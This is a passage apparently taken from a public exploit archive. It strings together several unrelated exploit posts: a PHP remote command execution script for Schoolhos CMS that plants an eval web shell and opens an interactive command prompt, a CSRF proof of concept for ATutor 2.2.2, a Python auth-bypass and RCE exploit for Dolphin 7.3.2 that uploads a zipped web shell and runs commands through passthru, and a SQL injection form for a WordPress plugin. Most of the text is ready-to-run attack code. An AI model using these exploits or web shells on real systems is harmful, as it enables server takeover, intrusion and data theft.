11/29/2011 02:06 AM 74 paragraf.rar
11/29/2011 02:04 AM 74 pemanasan.rar
11/29/2011 02:00 AM 74 polakalimat.rar
11/29/2011 02:15 AM 74 prepare.rar
11/29/2011 02:13 AM 74 proklamator.rar
11/29/2011 02:12 AM 74 sea games.rar
11/29/2011 02:05 AM 74 soekarno.rar
11/29/2011 02:09 AM 74 speaking.rar
11/29/2011 02:15 AM 74 ulangan INDO.rar
11/29/2011 02:11 AM 74 volume.rar
24 File(s) 34,662 bytes
2 Dir(s) 38,197,485,568 bytes free
0x4148@http://192.168.0.50/lab/scho/versi_2.29/# exit
~0x4148fo#
*/
$host=$argv[1];
$target="$host/elearningku/proses.php?pilih=guru&untukdi=upload";
echo "[*] Schoolhos CMS 2.29 Remote command execution\n";
echo "[*] Author : Ahmed sultan (0x4148)\n";
echo "[*] Connect : 0x4148.com | 0x4148@gmail.com\n\n";
echo " + Sending payload to $host\n";
fwrite(fopen("0x4148.php","w+"),'<?php eval(base64_decode($_POST["0x4148"])); ?>');
$x4148upload = curl_init();
curl_setopt($x4148upload, CURLOPT_URL, $target);
curl_setopt($x4148upload, CURLOPT_USERAGENT, "mozilla");
curl_setopt($x4148upload, CURLOPT_POST, 1);
curl_setopt($x4148upload, CURLOPT_RETURNTRANSFER, true);
curl_setopt($x4148upload, CURLOPT_POSTFIELDS,array("fupload"=>"@".realpath("0x4148.php")));
curl_setopt($x4148upload, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($x4148upload, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($x4148upload);
curl_close($x4148upload);
$x4148request=curl_init();
curl_setopt($x4148request,CURLOPT_RETURNTRANSFER,1);
curl_setopt($x4148request,CURLOPT_URL,$host."/file/materi/0x4148.php");
curl_setopt($x4148request, CURLOPT_POSTFIELDS,"0x4148=".base64_encode("echo '0x4148fo';"));
curl_setopt($x4148request, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($x4148request, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($x4148request,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($x4148request,CURLOPT_TIMEOUT,20);
curl_setopt($x4148request, CURLOPT_HEADER, true);
$outp=curl_exec($x4148request);
curl_close($x4148request);
if(!preg_match("#0x4148fo#",$outp)){
echo " - Failed :(\n";
die();
}
echo " + Payload sent successfully\n\n";
while(0<1){
echo "0x4148@$host# ";
$command=trim(fgets(STDIN));
if($command=='exit'){
die();
}
$x4148request=curl_init();
curl_setopt($x4148request,CURLOPT_RETURNTRANSFER,1);
curl_setopt($x4148request,CURLOPT_URL,$host."/file/materi/0x4148.php");
curl_setopt($x4148request, CURLOPT_POSTFIELDS,"0x4148=".urlencode(base64_encode("echo '>>>>>';system('$command');echo '>>>>>';")));
curl_setopt($x4148request, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($x4148request, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($x4148request,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($x4148request,CURLOPT_TIMEOUT,20);
curl_setopt($x4148request, CURLOPT_HEADER, true);
$outp=curl_exec($x4148request);
curl_close($x4148request);
echo explode(">>>>>",$outp)[1]."\n";
}
?>
# Exploit Title: ATutor_2.2.2 Learning Management System
# Cross-Site Request Forgery (Add New Course)
# Date: 13-11-2016
# Software Link: https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2
# Vendor: http://www.atutor.ca/
# Exploit Author: Saravana Kumar
# Contact: https://facebook.com/06saravanakumar
# Category: webapps
# Version: 2.2.2
# Platform: PHP
# Tested on: [Kali Linux 2.0 | Windows 7]
# Email: 06saravanakumar@gmail.com
# Affected URL:
http://localhost/ATutor/mods/_core/courses/users/create_course.php
==================================
Vulnerability Disclosure Timeline:
==================================
2016-11-07: Found the vulnerability and Reported to Vendor.
2016-11-08: Vendor Replied.
2016-11-10: Vendor Fixed the vulnerability.
2016-11-11: Patch released
2016-10-12: Public Disclosure
########################### CSRF PoC ###############################
<html>
<------ CSRF POC ------>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/ATutor/mods/_core/courses/users/create_course.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------34481053430281");
xhr.withCredentials = true;
var body = "-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"form_course\"\r\n" +
"\r\n" +
"true\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
"\r\n" +
"819200\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"course\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"old_access\"\r\n" +
"\r\n" +
"protected\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"created_date\"\r\n" +
"\r\n" +
"2016-11-07 06:55:20\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"show_courses\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"current_cat\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"title\"\r\n" +
"\r\n" +
"Programming Language\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"pri_lang\"\r\n" +
"\r\n" +
"en\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"description\"\r\n" +
"\r\n" +
"Python\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"category_parent\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"content_packaging\"\r\n" +
"\r\n" +
"top\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"rss\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"access\"\r\n" +
"\r\n" +
"protected\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"release_date\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"day_release\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"month_release\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"year_release\"\r\n" +
"\r\n" +
"2016\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"hour_release\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"min_release\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"end_date\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"day_end\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"month_end\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"year_end\"\r\n" +
"\r\n" +
"2017\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"hour_end\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"min_end\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"setvisual\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"banner\"\r\n" +
"\r\n" +
"\x3cp\x3eCan fill content what ever you want.\x3c/p\x3e\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"initial_content\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"quota\"\r\n" +
"\r\n" +
"-2\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"filesize\"\r\n" +
"\r\n" +
"-3\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"tracking\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"copyright\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"boolForce\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"icon\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
"\r\n" +
"819200\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"customicon\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"custOptCount\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"courseId\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Save\r\n" +
"-----------------------------34481053430281--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
---------------------------------------------------------------------------
Solution:
Patch is available. Install patch using the ATutor Patcher.
Link to download patch:
http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml
---------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Software : Dolphin <= 7.3.2 Auth bypass / RCE exploit
Vendor : www.boonex.com
Author : Ahmed sultan (0x4148)
Home : 0x4148.com | https://www.linkedin.com/in/0x4148
Email : 0x4148@gmail.com
Auth bypass trick credit go to Saadat Ullah
'''
import os
import sys
import urllib
import urllib2
import ssl
import base64
print "[+] Dolphin <= 7.3.2 Auth bypass / RCE exploit"
print "[+] Author : Ahmed sultan (0x4148)"
print "[+] Home : 0x4148.com\n"
if len(sys.argv)<2:
print "\nUsage : python "+sys.argv[0]+" http://HOST/path/\n"
sys.exit();
hosturl=sys.argv[1]
fields = {'csrf_token': 'Aint give a shit about csrf stuff ;)', 'submit_upload': '0x4148'}
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def generate_http_request(fields):
lmt = '---------------------------'
crlf = '\r\n'
x4148mltprt = []
x4148mltprt.append('--' + lmt)
if fields:
for (key, value) in fields.items():
x4148mltprt.append('Content-Disposition: form-data; name="%s"' % key)
x4148mltprt.append('')
x4148mltprt.append(value)
x4148mltprt.append('--' + lmt)
x4148mltprt.append('Content-Disposition: form-data; name="module"; filename="0x4148.zip"')
x4148mltprt.append('Content-Type: application/zip')
x4148mltprt.append('')
x4148mltprt.append("PK\x03\x04\x0a\x00\x00\x00\x00\x00RanIj\xf0\xfdU1\x00\x00\x001\x00\x00\x00\x0c\x00\x00\x000x4148fo.php"
"<?php\x0d\x0aeval(base64_decode($_POST[\'0x4148\']));\x0d\x0a?>PK\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00RanIj"
"\xf0\xfdU1\x00\x00\x001\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x00\x00\x00\x00\x00\x00\x000x4148fo.php"
"PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00:\x00\x00\x00[\x00\x00\x00\x00\x00")
x4148mltprt.append('--' + lmt + '--')
x4148mltprt.append('')
body = crlf.join(x4148mltprt)
content_type = 'multipart/form-data; boundary=%s' % (lmt)
return content_type, body
content_type, body = generate_http_request(fields)
print " + Sending payload to "+hosturl.split("//")[1].split("/")[0]
req = urllib2.Request(hosturl+"/administration/modules.php",body)
req.add_header('User-agent', 'Mozilla 15')
req.add_header("Cookie", "memberID=1; memberPassword[]=0x4148;")
req.add_header('Referer', hosturl+"/administration/modules.php")
req.add_header('Content-Type', content_type)
req.add_header('Content-Length', str(len(body)))
req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8')
try:
urllib2.urlopen(req,context=gcontext).read()
except urllib2.HTTPError, e:
err=e.fp.read()
print err
sys.exit()
print " * Checking if payload was send"
data = urllib.urlencode({'0x4148':'echo "0x4148foooo";'.encode('base64')})
req = urllib2.Request(hosturl+'/tmp/0x4148fo.php', data)
if urllib2.urlopen(req).read().find("0x4148foooo")==-1:
print " - Exploitation failed"
print req
sys.exit()
print " + php prompt up and running\n + type 'shell' to get shell access"
while True:
request=str(raw_input("\nphp>> "))
if request=="exit":
sys.exit()
if request=="shell" or request=="cmd":
print "\n + Switched to Shell mode\n + Type 'return' to return to php prompt mode"
while True:
cmd=str(raw_input("\n0x4148@"+hosturl.split("//")[1].split("/")[0]+"# "))
if cmd=="return":
break
if cmd=="exit":
sys.exit()
kkk="passthru('"+cmd+"');"
data = urllib.urlencode({'0x4148':kkk.encode('base64')})
req = urllib2.Request(hosturl+'/tmp/0x4148fo.php', data)
print urllib2.urlopen(req).read()
data = urllib.urlencode({'0x4148':request.encode('base64')})
req = urllib2.Request(hosturl+'/tmp/0x4148fo.php', data)
print urllib2.urlopen(req).read()
# Exploit Title: Product Catalog 8 1.2 Plugin WordPress – Sql Injection
# Date: 12/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/product-catalog-8/
# Software Link: https://wordpress.org/plugins/product-catalog-8/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.2
# Tested on: Windows 8.1
1 - Description:
$_POST[ ‘selectedCategory’ ] is not escaped.
UpdateCategoryList() is accessible for any user.
http://lenonleite.com.br/en/blog/2016/11/18/product-catalog-8-plugin-wordpress-sql-injection/
2 - Proof of Concept:
<form method="post" action="http://target/wp-admin/admin-ajax.php">
<input type="text" name="selectedCategory" value="0 UNION SELECT 1,2,3,4,5,6 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="UpdateCategoryList">
<input type="submit" value="Send">
</form>
3 - Timeline:
12/11/2016 - Discovered
12/11/2016 - vendor not found
--
Atenciosamente
Lenon Leite